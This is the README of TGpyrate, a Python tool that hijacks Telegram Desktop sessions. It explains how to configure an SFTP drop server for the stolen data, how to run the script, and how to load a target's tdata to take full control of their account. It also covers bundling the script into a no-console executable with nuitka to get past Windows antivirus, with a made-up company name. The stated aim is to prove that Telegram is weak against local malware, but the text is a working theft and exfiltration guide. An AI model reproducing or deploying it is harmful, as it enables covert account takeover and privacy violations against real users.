Telegram session hijacker with SFTP.
Telegram is sometimes referred to as a privacy-focused instant messenger.
Although it's FOSS and advertized to have good privacy, it's defenseless against local malware or forensics.
TGpyrate is therefore written to prove that.
$ git clone https://github.com/noarchwastaken/TGpyrate.git
$ cd TGpyrate
To run TGpyrate, you need:
python3
(tested on 3.9.1)paramiko
(tested on 2.7.2)
TGpyrate can automatically detect running "portable" versions of Telegram Desktop on Windows. To enable this optional feature, you need:
psutil
(tested on 5.7.2)
To make it actually useful, (of course) you need Telegram Desktop.
You can also bundle it using pyinstaller
or nuitka
.
To install everything mentioned here (assuming you have Python 3 and pip installed):
$ pip install -U -r requirements.txt
TGpyrate relies on an SFTP server to send data it collected.
An OpenSSH server with PasswordAuthentication yes
would serve that purpose.
It is also suggested to create a temporary user with a randomly generated password, and delete it once you are done.
TGpyrate uses hard-coded parameters that you can modify before running.
To do this, open tgpyrate.py
with a text editor, and edit according to your needs. Here's an example:
...
""" START USER PARAMETERS """
# your SFTP server info
# SFTP server location
SFTP_HOST = '127.0.0.1'
# SFTP server port
SFTP_PORT = 22
# SFTP server user
SFTP_USER = 'noarch'
# password of that remote user
SFTP_PASS = 'etarypGT'
...
After you have modified the SFTP server info, you can proceed to run TGpyrate:
$ python3 tgpyrate.py
The program will run for a while, and you should see a tar
file containing the Telegram session data on the SFTP user's home directory.
The file structure of the archive is relative to the target root, so it would look like this:
home
└── noarch
├── .local
│ └── share
│ └── TelegramDesktop
│ └── tdata
│ ├── ...
│ └── ...
│ ├── ...
...
The most basic usage of the extracted data is to simply put it in Telegram Desktop.
Assuming you are using the Telegram Desktop appimage on GNU/Linux, your Telegram Desktop data should be in:
~/.local/share/TelegramDesktop
Extract the TelegramDesktop directory of the archive to replace the above TelegramDesktop directory.
Open Telegram Desktop, you should be logged into the target's account, and have full access over it.
The output file of TGpyrate contains the target's OS type, version and the execution time in ISO format.
If you like hacking around, modify SFTP_DEST
.
SFTP_DEST = '{}-{}.tar.gz'.format(platform.platform(),
datetime.now(timezone.utc)
.astimezone()
.isoformat(timespec='seconds'))
If you want to save some bandwidth for the target, enable Gzip compression by setting GZIP_COMP_LEVEL
. For example:
GZIP_COMP_LEVEL = 4
You may also like to include the .gz
extension to SFTP_DEST, like the example above.
By default, TGpyrate searches through a series of default Telegram data storage.
You can add your own to installation_locations
.
The simplist way to bundle TGpyrate is by using pyinstaller
. You will need to have pyinstaller
installed:
$ pip install pyinstaller
To bundle TGpyrate to a single, standalone executable that runs without opening a console, simply run
$ pyinstaller -F --noconsole tgpyrate.py
and the output executable will be in the dist
directory.
Note that some Windows antivirus treat all executables generated by pyinstaller
as viruses, so you probably would need nuitka
if your target machine is running Windows.
Nuitka is a Python bundler / compiler.
It is available on pypi:
$ pip install nuitka
For nuitka
to work, you will need a C compiler like GCC or MSVC. nuitka
will prompt you to install one if you don't have it already.
After you get the compiler set up, run this to compile a single, standalone, no console executable for Windows:
$ python3 -m nuitka --standalone --onefile --windows-disable-console --windows-company-name=<your imaginary company here> --windows-file-version=11.45.14
In noarchwastaken's testing, nuitka
would fail to run in --onefile
mode on GNU/Linux, probably due to some problems when dealing with AppImageKit
.
No further testing has been done... Please open an issue if you found the solution.
For more information, read the Nuitka User Manual.
Feel free to open any issues or PR on this <150 sloc little script ;)
(c) 2021 noarchwastaken
This program is licensed under the GNU General Public License, Version 3. See the full license here.
This program is not intended to be used for illegal activities.
noarchwastaken is NOT responsible for any consequences of using this program.